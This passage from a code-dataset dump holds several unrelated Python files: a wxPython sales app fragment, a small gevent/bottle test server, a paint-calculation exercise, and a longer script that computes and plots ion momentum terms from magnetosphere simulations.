wx.ID_OK:\n plugin = wx.GetApp().getPluginFromConfig(INIT_PARSER)\n parser = partial(plugin.plugin_object.parse,CSV)\n self.backend.InitDatabase(dlg.GetPath(),parser=parser)\n self.statusbar.PushStatusText('Initialized database from file \"{}\"'\\\n .format(dlg.GetPath()))\n\n dlg.Destroy()\n\n\n def OnGenerateStatement(self, evt):\n dlg = StatementCreationWizard(self)\n if dlg.ShowModal() == wx.ID_OK:\n startDate, endDate = dlg.GetDates()\n path = dlg.GetPath()\n output_type = dlg.GetOutputType()\n\n writer = wx.GetApp().getPluginFromConfig({ STATEMENT: STATEMENT_WRITER,\n REGISTRY: REGISTRY_WRITER }[output_type]).plugin_object\n if output_type == STATEMENT:\n result = self.backend.GenerateStatement(startDate, endDate,\n changes_only=dlg.WantChangesOnly())\n else:\n result = self.backend.GenerateRegistry(startDate, endDate,\n changes_only=dlg.WantChangesOnly())\n\n writer.write(path, result, self.backend.QI(), startDate, endDate)\n self.statusbar.PushStatusText('Generated output file \"{}\"'.format(path))\n\n dlg.Destroy()\n\n def OnViewHistory(self, evt):\n self.history_viewer.Show(True)\n self.history_viewer.Raise()\n\n\n","repo_name":"miheerdew/SalesMan","sub_path":"salesman/lib/gui/MainFrame.py","file_name":"MainFrame.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30763998535","text":"import gevent.monkey, json, pickle\nfrom bottle import route, run, get, post, request\nfrom urllib.request import urlopen\n\ngdata = {}\n\ngevent.monkey.patch_all()\nurls = ['https://jsonplaceholder.typicode.com/users']\n\ndef print_head(url):\n global gdata\n print('Starting {}'.format(url))\n gdata['users'] = urlopen(url).read()\n #print(\"gdataj->\" + str(gdata))\n\n@get('/gthreads')\ndef gthreads():\n jobs = [gevent.spawn(print_head, _url) for _url in urls]\n gevent.wait(jobs)\n obj = json.loads(gdata.get('users').decode(\"utf-8\"))\n return obj[0]\n\nrun(host='localhost', port=8080, debug=True)\n","repo_name":"aegor/pythoncourses","sub_path":"controller_gthreads_test.py","file_name":"controller_gthreads_test.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18783534773","text":"x = float(input())\ny = float(input())\nh = float(input())\n\nrazhod_zelena_boya = 3.4\nrazhod_chervena_boya = 4.3\n\nvrata = 1.2 * 2\nprozorec = 1.5 * 1.5\nzadna_stena = x * x\npredna_stena = (x * x) - vrata\nstranichna_stena = (x * y) - prozorec\n\nplosht_steni = predna_stena + zadna_stena + 2 * stranichna_stena\n\npokriv_pravoygalnik = x * y\npokriv_triygalnik = (x * h) / 2\n\nplosht_pokriv = 2 * (pokriv_pravoygalnik + pokriv_triygalnik)\n\nlitri_zelena_boq = plosht_steni / razhod_zelena_boya\nlitri_chervena_boq = plosht_pokriv / razhod_chervena_boya\n\nprint(f\"{litri_zelena_boq:.2f}\")\nprint(f\"{litri_chervena_boq:.2f}\")","repo_name":"mKasapova/my-repo","sub_path":"PycharmProjects/Exercise1/exercises/house_painting.py","file_name":"house_painting.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28909213824","text":"import sys\nimport os\nimport glob\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib.dates as md\nimport matplotlib.patches as patches\nimport matplotlib.gridspec as gridspec\nimport scipy.interpolate as sci\nfrom matplotlib.colors import LogNorm\nimport matplotlib.colors as colors\nimport datetime as dt\nfrom matplotlib.figure import Figure\nfrom matplotlib import rc\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\nfrom matplotlib import ticker\nimport cProfile\nimport multiprocessing\nfrom classes import *\nimport plotting as myplot\n\n\n\ndef momentum(k,GM,reversal,cut,mode):\n home=os.getcwd()+'/'\n run =GM+'/'+reversal+'/'\n datalocation = home+run\n hr,mn=timestring(k)\n time = 't00'+hr+mn\n if not os.path.exists(datalocation):\n sys.exit('path does not exist')\n filelist=[]\n filelist.extend(glob.glob(datalocation+cut+'*'+time+'*'))\n filepath = filelist[0]\n filename = PlotProperties(filepath,-40.0,20.0,-20.0,20.0,True,cut,mode)\n data,connectivity,timetick = filename.get_data()\n xyz,bfield,J,stateFluid,nFluid=filename.data_readableSI(data) #everything is in SI Units\n lines = len(xyz)\n jxb = np.zeros((len(xyz),3))\n gyration,udiff = np.zeros((len(xyz),3,nFluid)),np.zeros((len(xyz),3,nFluid))\n jxb = np.cross(J,bfield)\n row,column=connectivity.shape\n # initialize arrays\n jxbcenterx,jxbcenterz = np.zeros(row),np.zeros(row)\n xcenter,zcenter = np.zeros(row),np.zeros(row)\n nratcenter = np.zeros((row,nFluid))\n dpedx,dpedz = np.zeros(row),np.zeros(row) \n nrat = np.zeros((len(xyz),nFluid))\n bodyx,bodyz = np.zeros((row,nFluid)),np.zeros((row,nFluid))\n friction = np.zeros((len(xyz),3,nFluid))\n gyrationcent = np.zeros((row,3,nFluid))\n frictioncent = np.zeros((row,3,nFluid))\n vdiffmagnorm = np.zeros((len(xyz),nFluid,nFluid))\n vdiff = np.zeros((len(xyz),3,nFluid,nFluid))\n uplus = np.zeros((len(xyz),3))\n qe = 1.602176621e-19\n amutokg = 1.660539e-27\n kgtoamu = 1./amutokg\n Re = 6.3781e6\n tau = 1000. #cutoff time scale\n uc = 100.*1.e3 #100 km/s to m/s cutoff velocity\n alpha = 2.\n p = connectivity-1 #recalibrate array index by 1 to match python from Fortran\n nDensity = np.zeros((len(xyz),nFluid))\n pressure = np.zeros((len(xyz),nFluid))\n #Assign to number density array\n for i in range(0,nFluid):\n nDensity[:,i] = stateFluid[:,0,i]*kgtoamu #convert mass density in SI units to amu/m^3\n pressure[:,i] = stateFluid[:,4,i]\n \n if (GM == 'SwHIonoO'): #change mass density to number density for oxygen by dividing by the appropriate mass unit\n nDensity[:,1] = nDensity[:,1]/16. \n if (GM == 'SwIonoO' or GM == 'SwIonoO28amu'):\n nDensity[:,2] = nDensity[:,2]/16.\n\n ntot = np.sum(nDensity,1)\n ptot = np.sum(pressure,1)\n\n #species velocity\n uspecies = np.zeros((len(xyz),3,nFluid))\n ###### calculate the gyration term\n # first calculate u+ (we are ignoring charge since we have a singly ionized plasma)\n uspecies = stateFluid[:,1:4,:]\n # calculate the numerator by calculating n_i*u_i for each direction\n for d in range(0,3):\n for i in range(0,nFluid):\n uplus[:,d] = uplus[:,d]+nDensity[:,i]*uspecies[:,d,i]\n\n # calculate u+ by dividing by the total number density\n for d in range(0,3):\n uplus[:,d] = np.divide(uplus[:,d],ntot[:])\n\n # there is no charge given that the ion and electron species have charge e\n\n # Calculate the velocity in the charge averaged frame\n for d in range(0,3):\n for i in range(0,nFluid):\n udiff[:,d,i] = uspecies[:,d,i]-uplus[:,d]\n ucrossb = np.zeros((len(xyz),3,nFluid))\n # Calculate the u x B term\n for i in range(0,nFluid):\n ucrossb[:,:,i] = np.cross(udiff[:,:,i],bfield)\n\n # Multiply by the charge and density of the ion to obtain the gyration term\n for d in range(0,3):\n for i in range(0,nFluid):\n gyration[:,d,i] = qe*nDensity[:,i]*ucrossb[:,d,i]\n ##### End of calculation of the gyration term\n \n \n ##### calculate friction\n # calculate difference between ion velocities, and normalized velocities\n for i in range(0,nFluid):\n for j in range(0,nFluid):\n vdiff[:,0:3,i,j] = stateFluid[:,1:4,j]-stateFluid[:,1:4,i]\n vdiffmagnorm[:,i,j] = [(np.sqrt(np.dot(vdiff[k,0:3,i,j],vdiff[k,0:3,i,j]))/uc)**alpha/tau for k in range(0,len(xyz))]\n\n #statefluid is used because it is the mass density\n for d in range(0,3):\n for i in range(0,nFluid):\n for j in range(0,nFluid):\n friction[:,d,i] = friction[:,d,i]+np.minimum(stateFluid[:,0,j],stateFluid[:,0,i])*vdiff[:,d,i,j]*vdiffmagnorm[:,i,j]\n\n \n #### End of friction calculation\n\n ##### This is the start of the calculation for the body forces\n # Calculate the fraction of each ion number density to total density\n for i in range(0,nFluid):\n nrat[:,i]=np.divide(nDensity[:,i],ntot)\n pe = 0.2*ptot #electron pressure\n \n\n \n for i in range(0,row):\n jxbcenterbottom = (jxb[p[i,1],0]+jxb[p[i,0],0])/2.\n jxbcenterup = (jxb[p[i,2],0]+jxb[p[i,3],0])/2.\n jxbcenterx[i] = (jxbcenterbottom+jxbcenterup)/2.\n jxbcenterbottom = (jxb[p[i,1],2]+jxb[p[i,0],2])/2.\n jxbcenterup = (jxb[p[i,2],2]+jxb[p[i,3],2])/2.\n jxbcenterz[i] = (jxbcenterbottom+jxbcenterup)/2.\n xcenter[i] = 0.5*(xyz[p[i,1],0]+xyz[p[i,0],0])/Re #center values of x and z in each cell\n zcenter[i] = 0.5*(xyz[p[i,1],2]+xyz[p[i,2],2])/Re\n \n ''' electron pressure gradient calculation\n calculate grad p in x direction by computing the slope of the bottom row and top row of the cell and average them\n calculate grad p in z direction by computing the slope\n of the left side and right side of the cell and average them\n '''\n dpedx[i] = 0.5*(pe[p[i,1]]-pe[p[i,0]]+pe[p[i,2]]-pe[p[i,3]])/\\\n ((xyz[p[i,1],0]-xyz[p[i,0],0]))\n dpedz[i] = 0.5*(pe[p[i,2]]-pe[p[i,1]]+pe[p[i,3]]-pe[p[i,0]])/\\\n ((xyz[p[i,2],2]-xyz[p[i,1],2]))\n for j in range(0,nFluid):\n nratcenter = 0.25*(nrat[p[i,0],j]+nrat[p[i,1],j]+\\\n nrat[p[i,2],j]+nrat[p[i,3],j])\n bodyx[i,j] = nratcenter*(jxbcenterx[i]-dpedx[i])\n bodyz[i,j] = nratcenter*(jxbcenterz[i]-dpedz[i])\n #### End of body force term calculations\n\n # Calculate center values of gyration and friction terms\n for i in range(0,row):\n for j in range(0,nFluid):\n gyrationcent[i,:,j] = 0.25*(gyration[p[i,0],:,j]+ \\\n gyration[p[i,1],:,j]+ \\\n gyration[p[i,2],:,j]+ \\\n gyration[p[i,3],:,j])\n frictioncent[i,:,j] = 0.25*(friction[p[i,0],:,j]+ \\\n friction[p[i,1],:,j]+ \\\n friction[p[i,2],:,j]+ \\\n friction[p[i,3],:,j])\n \n bodyx = bodyx/amutokg/1.e4 #convert to N/m^3 to amu/cm^2/s^2\n bodyz = bodyz/amutokg/1.e4\n gyrationcent = gyrationcent/amutokg/1.e4\n frictioncent = frictioncent/amutokg/1.e4\n return(xcenter,zcenter,bodyx,bodyz,gyrationcent,frictioncent,nFluid)\n\ndef specieslabelpaper(GM):\n if (GM == 'SwIono'):\n Title = [r'Sw H$^+$ ',r'Iono H$^+$ ']\n Filename = ['SwH','IonoH']\n if (GM == 'SwHIonoO'):\n Title = [r'Sw H$^+$ ',r'Iono O$^+$ ']\n Filename = ['SwH','O']\n if (GM == 'SwIonoO' or GM =='SwIonoO28amu'):\n Title = [r'Sw H$^+$ ', r'Iono H$^+$ ',r'Iono O$^+$ ']\n Filename = ['SwH','IonoH','O']\n return(Title,Filename)\n\ndef plotmomentum(o): #perform 2d interpolation to calculate the force density\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','bulk terms in the x-direction','friction in the x-direction'],['gyration in the z-direction','bulk terms in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n letter = np.array([['(a)','(b)','(c)'],['(d)','(e)','(f)']])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m])\n gyrationzi = twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m])\n bodyxi = twodinterpolate(xc,zc,xci,zci,bodyxx[:,m])\n bodyzi = twodinterpolate(xc,zc,xci,zci,bodyzz[:,m])\n frictionxi =twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m])\n frictionzi = twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m])\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrationxi,bodyxi,frictionxi],[gyrationzi,bodyzi,frictionzi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',norm=colors.SymLogNorm(linthresh=linthreshold[i,j],linscale=1,vmin=vmins[i,j],vmax=vmaxs[i,j],base=10),cmap=cmaps[j])\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('[amu/cm$^2$/sec$^2$]')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(letter[i,j]+' '+Titleadd[m]+Momentum[i,j])\n #ax[i,j].text(0.9,0.5,letter[i,j],transform=ax[i,j].transAxes,fontsize=10,color='black')\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'Momentumwithlastclosed/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentum'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n \n return\n\ndef plotratiorelative(o): #plot the relative ratio of the magnitude of the force densities to each other\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration/body force in x-direction','friction/body force in the x-direction','friction/gyration in the x-direction'],['gyration/body force in the z-direction','friction/body force in the z-direction','gyration/friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m]))\n gyrationzi = np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m]))\n bodyxi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyxx[:,m]))\n bodyzi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyzz[:,m]))\n frictionxi =np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m]))\n frictionzi = np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m]))\n gyrtobfxi,gyrtobfzi = np.divide(gyrationxi,bodyxi),np.divide(gyrationzi,bodyzi)\n frictobfxi,frictobfzi = np.divide(frictionxi,bodyxi),np.divide(frictionzi,bodyzi)\n frictogyrxi,frictogyrzi = np.divide(frictionxi,gyrationxi),np.divide(frictionzi,gyrationzi)\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrtobfxi,frictobfxi,frictogyrxi],[gyrtobfzi,frictobfzi,frictogyrzi]])\n for i in range(0,2):\n for j in range(0,3):\n #pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=10,cmap='magma')\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',norm=colors.LogNorm(vmin=1.e-2,vmax=1.e2),cmap='magma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Fractional Force Density')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratiorelative'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\ndef plotforceratio(o): #plot the relative ratio of the magnitude of the force densities to the magnitude of the total force density\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration/total force in x-direction','body force/total force in the x-direction','friction/total force in the x-direction'],['gyration/total force in the z-direction','body force/total force in the z-direction','friction/total force in the z-direction']])\n\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m])\n gyrationzi = twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m])\n bodyxi = twodinterpolate(xc,zc,xci,zci,bodyxx[:,m])\n bodyzi = twodinterpolate(xc,zc,xci,zci,bodyzz[:,m])\n frictionxi =twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m])\n frictionzi = twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m])\n totalfxi = gyrationxi+bodyxi+frictionxi\n totalfzi = gyrationzi+bodyzi+frictionzi\n \n gyrtototfxi,gyrtototfzi = np.absolute(np.divide(gyrationxi,totalfxi)),np.absolute(np.divide(gyrationzi,totalfzi))\n bodytototfxi,bodytototfzi = np.absolute(np.divide(bodyxi,totalfxi)),np.absolute(np.divide(bodyzi,totalfzi))\n frictototfxi,frictototfzi = np.absolute(np.divide(frictionxi,totalfxi)),np.absolute(np.divide(frictionzi,totalfzi))\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrtototfxi,bodytototfxi,frictototfxi],[gyrtototfzi,bodytototfzi,frictototfzi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=2,cmap='plasma')\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n #clb.set_label('Fractional Force Density')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratioabsolute'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\n\n\ndef plotratiototal(o): #plot the ratio of the magnitude of the force densities relative to the sum of the magnitude of the force densities\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','bulk terms in the x-direction','friction in the x-direction'],['gyration in the z-direction','bulk terms in the z-direction','friction in the z-direction']])\n linthreshold = np.array([[1.e4,1.e4,1e2],[1e4,1e4,1e2]])\n vmins=np.array([[-1.e7,-1.e7,-1.e5],[-1.e7,-1.e7,-1.e5]])\n vmaxs=np.array([[1.e7,1.e7,1.e5],[1e7,1.e7,1.e5]])\n letter = np.array([['(a)','(b)','(c)'],\n ['(d)','(e)','(f)']\n ])\n for a in range(0,2):\n for k in range(minimum,plotnumber):\n \n p = ordinate(cut)\n if(p==1):\n ylabel = r'Y [$R_E$]'\n if(p==2):\n ylabel = r'Z [$R_E$]' \n xc,zc,bodyxx,bodyzz,gyrationcent,frictioncent,nFluid=momentum(k,GM[o],reversal[a],cut,mode)\n #xold,zold,bodyx,bodyz = bodyforcespecies(k,GM[o],reversal[a],cut,mode)\n xci,zci = gridpoints(xc,N),gridpoints(zc,N)\n Titleadd,Extension = specieslabelpaper(GM[o])\n for m in range(0,nFluid):\n fig,ax=plt.subplots(2,3,figsize=(15,10))\n gyrationxi =np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,0,m]))\n gyrationzi = np.absolute(twodinterpolate(xc,zc,xci,zci,gyrationcent[:,2,m]))\n bodyxi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyxx[:,m]))\n bodyzi = np.absolute(twodinterpolate(xc,zc,xci,zci,bodyzz[:,m]))\n frictionxi =np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,0,m]))\n frictionzi = np.absolute(twodinterpolate(xc,zc,xci,zci,frictioncent[:,2,m]))\n momx = gyrationxi+bodyxi+frictionxi\n momz = gyrationzi+bodyzi+frictionzi\n gyrfracxi,gyrfraczi = np.divide(gyrationxi,momx),np.divide(gyrationzi,momz)\n bodyfracxi,bodyfraczi = np.divide(bodyxi,momx),np.divide(bodyzi,momz)\n fricfracxi,fricfraczi = np.divide(frictionxi,momx),np.divide(frictionzi,momz)\n xx = np.array([[xci,xci,xci],[xci,xci,xci]])\n yy = np.array([[zci,zci,zci],[zci,zci,zci]])\n zz = np.array([[gyrfracxi,bodyfracxi,fricfracxi],[gyrfraczi,bodyfraczi,fricfraczi]])\n for i in range(0,2):\n for j in range(0,3):\n pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],shading='nearest',vmin=0,vmax=1,cmap='plasma')\n #pcm=ax[i,j].pcolormesh(xx[i,j],yy[i,j],zz[i,j],vmin=vmins[i,j],vmax=vmaxs[i,j],cmap=cmaps[j])\n l=myplot.drawgeopause(ax[i,j],k,GM[o],reversal[a],cut)\n lc=myplot.plotlastclosedcomponent(ax[i,j],k,GM[o],reversal[a],cut)\n ax[i,j].set_xlim(-80,20)\n ax[i,j].set_ylim(-50,50)\n clb=fig.colorbar(pcm, ax=ax[i,j])\n clb.set_label('Absolute Abundance')\n draw_earth(ax[i,j])\n if(j==0):\n ax[i,j].set_ylabel(r'Z [$R_E$]')\n if(i==1):\n ax[i,j].set_xlabel(r'X [$R_E$]')\n ax[i,j].set_title(letter[i,j]+' '+Titleadd[m]+Momentum[i,j])\n Suptitle = Title[o]\n hr,mn=timestring(k)\n plt.suptitle(Suptitle+IMF[a]+' at T='+hr+':'+mn) \n print(hr,mn,GM[o],reversal[a])\n home=os.getcwd()+'/'\n plt.figlegend((l[0],l[1],l[2],lc),Legends,(loffset[o],0.01),markerscale=3,ncol=4,fontsize=10,frameon=False)\n plotlocation = home+'MomentumRatio/'+GM[o]+'/'+reversal[a]+'/'\n if not os.path.exists(plotlocation):\n os.makedirs(plotlocation)\n print('making a plot directory')\n plotpath = plotlocation+'meridionalmomentumratio'+Extension[m]+'t'+hr+mn+'.png'\n fig.savefig(plotpath,dpi=300)\n plt.close(fig)\n print('plot saved to:',plotpath)\n return\n\n\ndef plotratioscatter(o):\n GM = ['SwIono','SwHIonoO','SwIonoO','SwIonoO28amu']\n Geopause = ['Density Geopause','Mass Density Geopause','Pressure Geopause']\n Title=['Sw H + Iono H','Sw H + Iono O','Sw H + Iono H + O','Sw H + Iono H + O at 28 amu/cc']\n reversal = ['runFlipNorth','runFlipSouth']\n Legends = ['Number Density Geopause','Mass Density Geopause','Pressure Geopause','Magnetopause']\n IMF = [' for South-to-North IMF',' for North-to-South IMF']\n quantity = ['geopause','rho','pressure']\n mode = '2d'\n minimum = 12*60#0\n plotnumber = 1+12*60\n a = 0\n colorsquant= ['sienna','green','k']\n cmaps = ['seismic','seismic','bwr']\n loffset = [0.25,0.25,0.25,0.25]\n cut = 'y'\n N = 1000\n rc('font',family='serif')\n rc('text', usetex=True)\n Momentum = np.array([['gyration in the x-direction','body force fraction in the 